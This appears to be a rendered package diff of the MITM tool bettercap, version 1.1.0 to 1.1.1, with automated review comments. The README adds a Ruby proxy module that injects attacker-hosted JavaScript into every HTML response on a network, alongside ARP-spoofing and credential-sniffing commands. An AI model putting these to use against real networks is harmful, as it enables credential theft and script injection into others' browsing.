bettercap 1.1.0 → 1.1.1
- checksums.yaml +4 -4
- data/README.md +88 -12
- data/bin/bettercap +54 -13
- data/lib/bettercap/banner +6 -0
- data/lib/bettercap/context.rb +14 -3
- data/lib/bettercap/httpd/server.rb +46 -0
- data/lib/bettercap/sniffer/parsers/mail.rb +1 -1
- data/lib/bettercap/sniffer/sniffer.rb +5 -1
- data/lib/bettercap/spoofers/arp.rb +1 -1
- data/lib/bettercap/version.rb +2 -1
- metadata +4 -2
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA1:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 2f2679288f69bf8a4ffddf816e7ea6f38aa9d9f3
|
4
|
+
data.tar.gz: 87d882d14a178868c080c687e1adf4986b654155
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 595325163b629bf5a2c5e7601850db166ed3a85d6536ffe57f2988d8126898bcbe39ec5ac49b86915132434386ab7993d061887b1385ebb77de392a3707a8b4a
|
7
|
+
data.tar.gz: d954e56b18fd9e73f80f58919887f3589b1749eccc9f4a131f6e677f636ba5cbabd14823383ea350cbe7229a4d27e7f2ffd9c4f0e18d0f3751f25924b6088596
|
data/README.md
CHANGED
@@ -4,10 +4,41 @@ BETTERCAP
|
|
4
4
|
Copyleft of **Simone 'evilsocket' Margaritelli**.
|
5
5
|
http://www.evilsocket.net/
|
6
6
|
|
7
|
+
http://www.bettercap.org/
|
7
8
|
---
|
8
9
|
|
9
|
-
|
10
|
-
|
10
|
+
**bettercap** is a complete, modular, portable and easily extensible **MITM** tool and framework with every kind of diagnostic
|
11
|
+
and offensive feature you could need in order to perform a man in the middle attack.
|
12
|
+
|
13
|
+
MOTIVATIONS
|
14
|
+
===
|
15
|
+
|
16
|
+
> Yet another MITM tool? C'mon, really?!!?
|
17
|
+
|
18
|
+
This is exactly what you are thinking right now, isn't it? :D
|
19
|
+
But allow yourself to think about it for 5 more minutes ... what you should be really asking is:
|
20
|
+
|
21
|
+
> Does a complete, modular, portable and easy to extend MITM tool actually exist?
|
22
|
+
|
23
|
+
If your answer is "ettercap", let me tell you something:
|
24
|
+
|
25
|
+
* ettercap **was** a great tool, but it made its time.
|
26
|
+
* ettercap filters **do not** work most of the times, are outdated and hard to implement due to the specific language they're implemented in.
|
27
|
+
* ettercap is freaking **unstable** on big networks ... try to launch the host discovery on a bigger network rather than the usual /24 ;)
|
28
|
+
* yeah you can see connections and raw pcap stuff, **nice toy**, but **as a professional researcher I want to see only relevant stuff**.
|
29
|
+
* unless you're a C/C++ developer, you can't easily extend ettercap or make your own module.
|
30
|
+
|
31
|
+
Indeed you could use more than just one tool ... maybe [arpspoof](http://linux.die.net/man/8/arpspoof) to perform the actual poisoning, [mitmproxy](http://mitmproxy.org) to intercept HTTP stuff and inject your payloads and so forth ... I don't know about you, but I **hate** when I need to use a dozen of tools just to perform one single attack, especially when I need to do some black magic in order to make all of them work on my distro or on OSX ... what about the [KISS](https://en.wikipedia.org/wiki/KISS_principle) principle?
|
32
|
+
|
33
|
+
So **bettercap** was born ( isn't the name pure genius? XD ) ...
|
34
|
+
|
35
|
+
HOST DISCOVERY + ARP MAN IN THE MIDDLE
|
36
|
+
===
|
37
|
+
|
38
|
+
You can target the whole network or a single known address, it doesn't really matter, bettercap arp spoofing capabilities and its multiple hosts discovery agents will do the dirty work for you.
|
39
|
+
Just launch the tool and wait for it to do its job ... again, [KISS!](https://en.wikipedia.org/wiki/KISS_principle)
|
40
|
+
|
41
|
+
![credentials](https://raw.github.com/evilsocket/bettercap/master/pics/discovery.png)
|
11
42
|
|
12
43
|
CREDENTIALS SNIFFER
|
13
44
|
===
|
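Review bot: The new discovery screenshot at the end of this hunk reuses the alt text `credentials` (`![credentials](.../pics/discovery.png)`), which is misleading for readers relying on alt text; suggest `![discovery](...)`. The same alt text is later reused for `proxy.png` as well.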
@@ -23,44 +54,48 @@ The built in sniffer is currently able to dissect and print from the network the
|
|
23
54
|
- POP, IMAP and SMTP credentials.
|
24
55
|
- NTLMv1/v2 ( HTTP, SMB, LDAP, etc ) credentials.
|
25
56
|
|
57
|
+
![credentials](https://raw.github.com/evilsocket/bettercap/master/pics/credentials.png)
|
58
|
+
|
26
59
|
**Examples**
|
27
60
|
|
28
61
|
Default sniffer mode, all parsers enabled:
|
29
62
|
|
30
|
-
sudo
|
63
|
+
sudo bettercap -X
|
31
64
|
|
32
65
|
Enable sniffer and load only specified parsers:
|
33
66
|
|
34
|
-
sudo
|
67
|
+
sudo bettercap -X -P "FTP,HTTPAUTH,MAIL,NTLMSS"
|
35
68
|
|
36
69
|
Enable sniffer + all parsers and parse local traffic as well:
|
37
70
|
|
38
|
-
sudo
|
71
|
+
sudo bettercap -X -L
|
39
72
|
|
40
|
-
TRANSPARENT PROXY
|
73
|
+
MODULAR TRANSPARENT PROXY
|
41
74
|
===
|
42
75
|
|
43
76
|
A modular transparent proxy can be started with the --proxy argument, by default it won't do anything
|
44
77
|
but logging HTTP requests, but if you specify a **--proxy-module** argument you will be able to load
|
45
78
|
your own modules and manipulate HTTP traffic as you like.
|
46
79
|
|
80
|
+
![credentials](https://raw.github.com/evilsocket/bettercap/master/pics/proxy.png)
|
81
|
+
|
47
82
|
**Examples**
|
48
83
|
|
49
84
|
Enable proxy on default ( 8080 ) port with no modules ( quite useless ):
|
50
85
|
|
51
|
-
sudo
|
86
|
+
sudo bettercap --proxy
|
52
87
|
|
53
88
|
Enable proxy and use a custom port:
|
54
89
|
|
55
|
-
sudo
|
90
|
+
sudo bettercap --proxy --proxy-port=8081
|
56
91
|
|
57
92
|
Enable proxy and load the module **example_proxy_module.rb**:
|
58
93
|
|
59
|
-
sudo
|
94
|
+
sudo bettercap --proxy --proxy-module=example_proxy_module.rb
|
60
95
|
|
61
96
|
Disable spoofer and enable proxy ( stand alone proxy mode ):
|
62
97
|
|
63
|
-
sudo
|
98
|
+
sudo bettercap -S NONE --proxy
|
64
99
|
|
65
100
|
**Modules**
|
66
101
|
|
@@ -81,16 +116,57 @@ class HackTitle < Proxy::Module
|
|
81
116
|
end
|
82
117
|
```
|
83
118
|
|
119
|
+
BUILTIN HTTP SERVER
|
120
|
+
===
|
121
|
+
|
122
|
+
You want to serve your custom javascript files on the network? Maybe you wanna inject some custom
|
123
|
+
script or image into HTTP responses using a transparent proxy module but you got no public server
|
124
|
+
to use? **no worries dude** :D
|
125
|
+
A builtin HTTP server comes with bettercap, allowing you to serve custom contents from your own
|
126
|
+
machine without installing and configuring other softwares such as Apache, nginx or lighttpd.
|
127
|
+
|
128
|
+
You could use a **proxy module** like the following:
|
129
|
+
|
130
|
+
```ruby
|
131
|
+
class InjectJS < Proxy::Module
|
132
|
+
def on_request( request, response )
|
133
|
+
# is it a html page?
|
134
|
+
if response.content_type == 'text/html'
|
135
|
+
Logger.info "Injecting javascript file into http://#{request.host}#{request.url} page"
|
136
|
+
# get the local interface address and HTTPD port
|
137
|
+
localaddr = Context.get.iface[:ip_saddr]
|
138
|
+
localport = Context.get.options[:httpd_port]
|
139
|
+
# inject the js
|
140
|
+
response.body.sub!( '</title>', "<script src='http://#{localaddr}:#{localport}/file.js' type='text/javascript'></script></title>" )
|
141
|
+
end
|
142
|
+
end
|
143
|
+
end
|
144
|
+
```
|
145
|
+
|
146
|
+
And then use it to inject the js file in every HTTP response of the network, using bettercap itself
|
147
|
+
to serve the file:
|
148
|
+
|
149
|
+
sudo bettercap --httpd --http-path=/path/to/your/js/file/ --proxy --proxy-module=inject.rb
|
150
|
+
|
84
151
|
HOW TO INSTALL
|
85
152
|
===
|
86
153
|
|
154
|
+
**Stable Release ( GEM )**
|
155
|
+
|
156
|
+
gem install bettercap
|
157
|
+
|
158
|
+
**From Source**
|
159
|
+
|
160
|
+
git clone https://github.com/evilsocket/bettercap
|
161
|
+
cd bettercap
|
87
162
|
gem build bettercap.gemspec
|
88
163
|
sudo gem install bettercap*.gem
|
89
164
|
|
90
165
|
DEPENDS
|
91
166
|
===
|
92
167
|
|
168
|
+
All dependencies will be automatically installed through the GEM system.
|
169
|
+
|
93
170
|
- colorize (**gem install colorize**)
|
94
171
|
- packetfu (**gem install packetfu**)
|
95
|
-
- pcaprub (**gem install pcaprub**) [sudo apt-get install ruby-dev libpcap-dev]
|
96
|
-
|
172
|
+
- pcaprub (**gem install pcaprub**) [sudo apt-get install ruby-dev libpcap-dev]
|
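Review bot: The example command in the BUILTIN HTTP SERVER section, `sudo bettercap --httpd --http-path=/path/to/your/js/file/ --proxy --proxy-module=inject.rb`, uses an option that does not exist: the option parser in `bin/bettercap` defines `--httpd-path PATH`, not `--http-path`, so the command as documented fails to parse. Suggest changing it to `--httpd-path=/path/to/your/js/file/`. It would also help readers to mention here that the server defaults to port 8081 (`--httpd-port`), since the `InjectJS` example reads that value from `Context.get.options[:httpd_port]`.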
data/bin/bettercap
CHANGED
@@ -17,7 +17,7 @@ require 'colorize'
|
|
17
17
|
require 'packetfu'
|
18
18
|
require 'ipaddr'
|
19
19
|
|
20
|
-
Object.send :remove_const, :Config
|
20
|
+
Object.send :remove_const, :Config rescue nil
|
21
21
|
Config = RbConfig
|
22
22
|
|
23
23
|
require 'bettercap/error'
|
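Review bot: `Object.send :remove_const, :Config rescue nil` uses the statement-modifier `rescue`, which swallows every `StandardError` (not only the `NameError` raised when `Config` is absent) and hides real failures. Suggest the explicit guard `Object.send(:remove_const, :Config) if Object.const_defined?(:Config)`, which expresses the intent and raises on anything unexpected.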
@@ -36,16 +36,12 @@ require 'bettercap/proxy/request'
|
|
36
36
|
require 'bettercap/proxy/response'
|
37
37
|
require 'bettercap/proxy/proxy'
|
38
38
|
require 'bettercap/proxy/module'
|
39
|
+
require 'bettercap/httpd/server'
|
39
40
|
|
40
41
|
begin
|
41
42
|
|
42
|
-
|
43
|
-
|
44
|
-
puts '---------------------------------------------------------'.yellow
|
45
|
-
puts " BETTERCAP v#{BetterCap::VERSION}\n\n".green
|
46
|
-
puts ' by Simone "evilsocket" Margaritelli'.green
|
47
|
-
puts ' evilsocket@gmail.com '.green
|
48
|
-
puts "---------------------------------------------------------\n\n".yellow
|
43
|
+
puts BetterCap::BANNER.green.bold
|
44
|
+
puts "\n\n\n"
|
49
45
|
|
50
46
|
ctx = Context.get
|
51
47
|
|
@@ -60,11 +56,11 @@ begin
|
|
60
56
|
ctx.options[:spoofer] = v
|
61
57
|
end
|
62
58
|
|
63
|
-
opts.on( '-T', '--target ADDRESS', 'Target
|
59
|
+
opts.on( '-T', '--target ADDRESS', 'Target IP address, if not specified the whole subnet will be targeted.' ) do |v|
|
64
60
|
ctx.options[:target] = v
|
65
61
|
end
|
66
62
|
|
67
|
-
opts.on( '-O', '--log LOG_FILE', 'Log all
|
63
|
+
opts.on( '-O', '--log LOG_FILE', 'Log all messages into a file, if not specified the log messages will be only print into the shell.' ) do |v|
|
68
64
|
ctx.options[:logfile] = v
|
69
65
|
end
|
70
66
|
|
@@ -101,8 +97,46 @@ begin
|
|
101
97
|
opts.on( '--proxy-module MODULE', 'Ruby proxy module to load.' ) do |v|
|
102
98
|
ctx.options[:proxy_module] = File.expand_path v
|
103
99
|
end
|
100
|
+
|
101
|
+
opts.on( '--httpd', 'Enable HTTP server, default to false.' ) do
|
102
|
+
ctx.options[:httpd] = true
|
103
|
+
end
|
104
|
+
|
105
|
+
opts.on( '--httpd-port PORT', 'Set HTTP server port, default to ' + ctx.options[:httpd_port].to_s + '.' ) do |v|
|
106
|
+
ctx.options[:httpd] = true
|
107
|
+
ctx.options[:httpd_port] = v.to_i
|
108
|
+
end
|
109
|
+
|
110
|
+
opts.on( '--httpd-path PATH', 'Set HTTP server path, default to ' + ctx.options[:httpd_path] + '.' ) do |v|
|
111
|
+
ctx.options[:httpd] = true
|
112
|
+
ctx.options[:httpd_path] = v
|
113
|
+
end
|
114
|
+
|
115
|
+
opts.on('-h', '--help', 'Display the available options.') do
|
116
|
+
puts opts
|
117
|
+
puts "\nExamples:\n".bold
|
118
|
+
puts " - Sniffer / Credentials Harvester\n".bold
|
119
|
+
puts " Default sniffer mode, all parsers enabled:\n\n"
|
120
|
+
puts " sudo bettercap -X\n".bold
|
121
|
+
puts " Enable sniffer and load only specified parsers:\n\n"
|
122
|
+
puts " sudo bettercap -X -P \"FTP,HTTPAUTH,MAIL,NTLMSS\"\n".bold
|
123
|
+
puts " Enable sniffer + all parsers and parse local traffic as well:\n\n"
|
124
|
+
puts " sudo bettercap -X -L\n".bold
|
125
|
+
puts " - Transparent Proxy\n".bold
|
126
|
+
puts " Enable proxy on default ( 8080 ) port with no modules ( quite useless ):\n\n"
|
127
|
+
puts " sudo bettercap --proxy\n".bold
|
128
|
+
puts " Enable proxy and use a custom port:\n\n"
|
129
|
+
puts " sudo bettercap --proxy --proxy-port=8081\n".bold
|
130
|
+
puts " Enable proxy and load the module example_proxy_module.rb:\n\n"
|
131
|
+
puts " sudo bettercap --proxy --proxy-module=example_proxy_module.rb\n".bold
|
132
|
+
puts " Disable spoofer and enable proxy ( stand alone proxy mode ):\n\n"
|
133
|
+
puts " sudo bettercap -S NONE --proxy".bold
|
134
|
+
exit
|
135
|
+
end
|
104
136
|
end.parse!
|
105
137
|
|
138
|
+
raise BetterCap::Error, 'This software must run as root.' unless Process.uid == 0
|
139
|
+
|
106
140
|
Logger.debug_enabled = true unless !ctx.options[:debug]
|
107
141
|
|
108
142
|
Logger.logfile = ctx.options[:logfile]
|
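Review bot: The `--httpd-path PATH` handler stores `v` verbatim, while `--proxy-module` in the same hunk applies `File.expand_path v`; without expansion a relative path is resolved against whatever the current working directory is at the time WEBrick is constructed, so the served directory may not be the one the operator meant. Suggest `ctx.options[:httpd_path] = File.expand_path v`. Similarly `--httpd-port PORT` does `v.to_i` with no validation, so `--httpd-port abc` silently becomes port 0; rejecting values outside 1..65535 with a `BetterCap::Error` would match the root check added just after `end.parse!`.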
@@ -122,15 +156,17 @@ begin
|
|
122
156
|
|
123
157
|
ctx.spoofer = SpooferFactory.get_by_name( ctx.options[:spoofer] )
|
124
158
|
|
125
|
-
Logger.info " Local
|
126
|
-
Logger.info " Local MAC : #{ctx.iface[:eth_saddr]}"
|
127
|
-
Logger.info " Gateway : #{ctx.gateway}"
|
159
|
+
Logger.info " Local : #{ctx.iface[:ip_saddr]} ( #{ctx.iface[:eth_saddr]} )"
|
128
160
|
|
129
161
|
Logger.debug "Module: #{ctx.options[:spoofer]}"
|
130
162
|
|
131
163
|
ctx.spoofer.start
|
132
164
|
|
133
165
|
if ctx.options[:proxy]
|
166
|
+
if ctx.options[:sniffer] and ( ctx.options[:parsers].include?'*' or ctx.options[:parsers].include?'URL' )
|
167
|
+
Logger.warn "WARNING: Both HTTP transparent proxy and URL parser are enabled, you're gonna see duplicated logs."
|
168
|
+
end
|
169
|
+
|
134
170
|
ctx.firewall.add_port_redirection( ctx.options[:iface], 'TCP', 80, ctx.iface[:ip_saddr], ctx.options[:proxy_port] )
|
135
171
|
|
136
172
|
if not ctx.options[:proxy_module].nil?
|
@@ -157,6 +193,11 @@ begin
|
|
157
193
|
ctx.proxy.start
|
158
194
|
end
|
159
195
|
|
196
|
+
if ctx.options[:httpd]
|
197
|
+
ctx.httpd = HTTPD::Server.new( ctx.options[:httpd_port], ctx.options[:httpd_path] )
|
198
|
+
ctx.httpd.start
|
199
|
+
end
|
200
|
+
|
160
201
|
if ctx.options[:sniffer]
|
161
202
|
Sniffer.start ctx
|
162
203
|
else
|
data/lib/bettercap/context.rb
CHANGED
@@ -15,7 +15,7 @@ require 'bettercap/error'
|
|
15
15
|
|
16
16
|
class Context
|
17
17
|
attr_accessor :options, :iface, :ifconfig, :network, :firewall, :gateway,
|
18
|
-
:targets, :spoofer, :proxy
|
18
|
+
:targets, :spoofer, :proxy, :httpd
|
19
19
|
|
20
20
|
@@instance = nil
|
21
21
|
|
@@ -37,25 +37,32 @@ class Context
|
|
37
37
|
:local => false,
|
38
38
|
:debug => false,
|
39
39
|
:arpcache => false,
|
40
|
+
|
40
41
|
:proxy => false,
|
41
42
|
:proxy_port => 8080,
|
42
|
-
:proxy_module => nil
|
43
|
+
:proxy_module => nil,
|
44
|
+
|
45
|
+
:httpd => false,
|
46
|
+
:httpd_port => 8081,
|
47
|
+
:httpd_path => './'
|
43
48
|
}
|
44
49
|
|
45
50
|
@iface = nil
|
46
51
|
@ifconfig = nil
|
47
52
|
@network = nil
|
48
|
-
@firewall =
|
53
|
+
@firewall = nil
|
49
54
|
@gateway = nil
|
50
55
|
@targets = []
|
51
56
|
@proxy = nil
|
52
57
|
@spoofer = nil
|
58
|
+
@httpd = nil
|
53
59
|
|
54
60
|
@discovery_running = false
|
55
61
|
@discovery_thread = nil
|
56
62
|
end
|
57
63
|
|
58
64
|
def update_network
|
65
|
+
@firewall = FirewallFactory.get_firewall
|
59
66
|
@iface = PacketFu::Utils.whoami? :iface => @options[:iface]
|
60
67
|
@ifconfig = PacketFu::Utils.ifconfig @options[:iface]
|
61
68
|
@network = @ifconfig[:ip4_obj]
|
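Review bot: The new default `:httpd_path => './'` means that enabling `--httpd` without `--httpd-path` serves the current working directory of the bettercap process to the network; if the tool is launched from a home directory or a directory containing captured logs (`-O LOG_FILE`), those files become downloadable. Suggest either defaulting to a dedicated directory or having the server start log a clear warning with the absolute path being served, so the operator sees what is exposed.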
@@ -120,5 +127,9 @@ class Context
|
|
120
127
|
if !@firewall.nil?
|
121
128
|
@firewall.enable_forwarding(false)
|
122
129
|
end
|
130
|
+
|
131
|
+
if !@httpd.nil?
|
132
|
+
@httpd.stop
|
133
|
+
end
|
123
134
|
end
|
124
135
|
end
|
@@ -0,0 +1,46 @@
|
|
1
|
+
=begin
|
2
|
+
|
3
|
+
BETTERCAP
|
4
|
+
|
5
|
+
Author : Simone 'evilsocket' Margaritelli
|
6
|
+
Email : evilsocket@gmail.com
|
7
|
+
Blog : http://www.evilsocket.net/
|
8
|
+
|
9
|
+
This project is released under the GPL 3 license.
|
10
|
+
|
11
|
+
=end
|
12
|
+
require 'webrick'
|
13
|
+
|
14
|
+
require 'bettercap/logger'
|
15
|
+
|
16
|
+
module HTTPD
|
17
|
+
|
18
|
+
class Server
|
19
|
+
def initialize( port = 8081, path = './' )
|
20
|
+
@port = port
|
21
|
+
@path = path
|
22
|
+
@server = WEBrick::HTTPServer.new(
|
23
|
+
:Port => @port,
|
24
|
+
:DocumentRoot => @path,
|
25
|
+
:Logger => WEBrick::Log.new("/dev/null"),
|
26
|
+
:AccessLog => []
|
27
|
+
)
|
28
|
+
end
|
29
|
+
|
30
|
+
def start
|
31
|
+
Logger.info "Starting HTTPD on port #{@port} and path #{@path} ..."
|
32
|
+
@thread = Thread.new {
|
33
|
+
@server.start
|
34
|
+
}
|
35
|
+
end
|
36
|
+
|
37
|
+
def stop
|
38
|
+
Logger.info 'Stopping HTTPD ...'
|
39
|
+
|
40
|
+
@server.stop
|
41
|
+
@thread.join
|
42
|
+
end
|
43
|
+
end
|
44
|
+
|
45
|
+
end
|
46
|
+
|
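Review bot: `stop` calls `@server.stop`, which only flips WEBrick's status flag; `@server.shutdown` additionally closes the listening sockets and is the right call for a clean teardown from `Context#finalize`. Two further points on the constructor: no `:BindAddress` is given, so WEBrick listens on every interface, not only the spoofed one, and `:Logger => WEBrick::Log.new("/dev/null")` together with `:AccessLog => []` discards every record of what was requested and served. Routing the access log into `Logger.debug` (and binding to `Context.get.iface[:ip_saddr]`) would keep the operator informed without adding noise. Also, exceptions raised inside the `Thread.new { @server.start }` block die silently; wrapping it in a `rescue` that reports through `Logger.error` would surface startup failures.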
@@ -13,7 +13,7 @@ require 'bettercap/sniffer/parsers/base'
|
|
13
13
|
|
14
14
|
class MailParser < BaseParser
|
15
15
|
def initialize
|
16
|
-
@filters = [ /(\d+ )?(auth|authenticate) (
|
16
|
+
@filters = [ /(\d+ )?(auth|authenticate) ([a-z\-_0-9]+)/i ]
|
17
17
|
@name = 'MAIL'
|
18
18
|
end
|
19
19
|
end
|
@@ -31,7 +31,11 @@ class Sniffer
|
|
31
31
|
next if ( pkt.ip_saddr == ctx.iface[:ip_saddr] or pkt.ip_daddr == ctx.iface[:ip_saddr] ) and !ctx.options[:local]
|
32
32
|
|
33
33
|
@@parsers.each do |parser|
|
34
|
-
|
34
|
+
begin
|
35
|
+
parser.on_packet pkt
|
36
|
+
rescue Exception => e
|
37
|
+
Logger.warn e.message
|
38
|
+
end
|
35
39
|
end
|
36
40
|
end
|
37
41
|
end
|
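Review bot: `rescue Exception => e` around `parser.on_packet pkt` is too broad: `Exception` includes `Interrupt`, `SystemExit` and `NoMemoryError`, so a Ctrl-C arriving while a parser runs is logged as a warning and swallowed instead of stopping the sniffer. Suggest `rescue StandardError => e`, which still catches parser bugs (the intent of this change) while letting signals and exits propagate. Logging `e.class` alongside `e.message`, or `e.backtrace.first` under `Logger.debug`, would also make parser failures easier to track down.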
@@ -32,7 +32,7 @@ class ArpSpoofer < ISpoofer
|
|
32
32
|
raise BetterCap::Error, "Couldn't determine router MAC"
|
33
33
|
end
|
34
34
|
|
35
|
-
Logger.info " Gateway
|
35
|
+
Logger.info " Gateway : #{@ctx.gateway} ( #{@gw_hw} )"
|
36
36
|
end
|
37
37
|
|
38
38
|
def send_spoofed_packed( saddr, smac, daddr, dmac )
|
data/lib/bettercap/version.rb
CHANGED
metadata
CHANGED
@@ -1,14 +1,14 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: bettercap
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 1.1.
|
4
|
+
version: 1.1.1
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- Simone Margaritelli
|
8
8
|
autorequire:
|
9
9
|
bindir: bin
|
10
10
|
cert_chain: []
|
11
|
-
date: 2015-07-
|
11
|
+
date: 2015-07-25 00:00:00.000000000 Z
|
12
12
|
dependencies:
|
13
13
|
- !ruby/object:Gem::Dependency
|
14
14
|
name: colorize
|
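Review bot: `cert_chain: []` in the gemspec metadata shows the 1.1.1 gem is published unsigned, so `gem install bettercap` cannot verify the package beyond the rubygems.org transport; users of a tool that runs as root (see the new `Process.uid == 0` check) would benefit from a signed gem, which lets them install with `gem install -P HighSecurity` after trusting the author's certificate.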
@@ -59,6 +59,7 @@ executables:
|
|
59
59
|
extensions: []
|
60
60
|
extra_rdoc_files: []
|
61
61
|
files:
|
62
|
+
- lib/bettercap/banner
|
62
63
|
- lib/bettercap/base/ifirewall.rb
|
63
64
|
- lib/bettercap/base/ispoofer.rb
|
64
65
|
- lib/bettercap/context.rb
|
@@ -72,6 +73,7 @@ files:
|
|
72
73
|
- lib/bettercap/factories/spoofer_factory.rb
|
73
74
|
- lib/bettercap/firewalls/linux.rb
|
74
75
|
- lib/bettercap/firewalls/osx.rb
|
76
|
+
- lib/bettercap/httpd/server.rb
|
75
77
|
- lib/bettercap/hw-prefixes
|
76
78
|
- lib/bettercap/logger.rb
|
77
79
|
- lib/bettercap/monkey/packetfu/utils.rb
|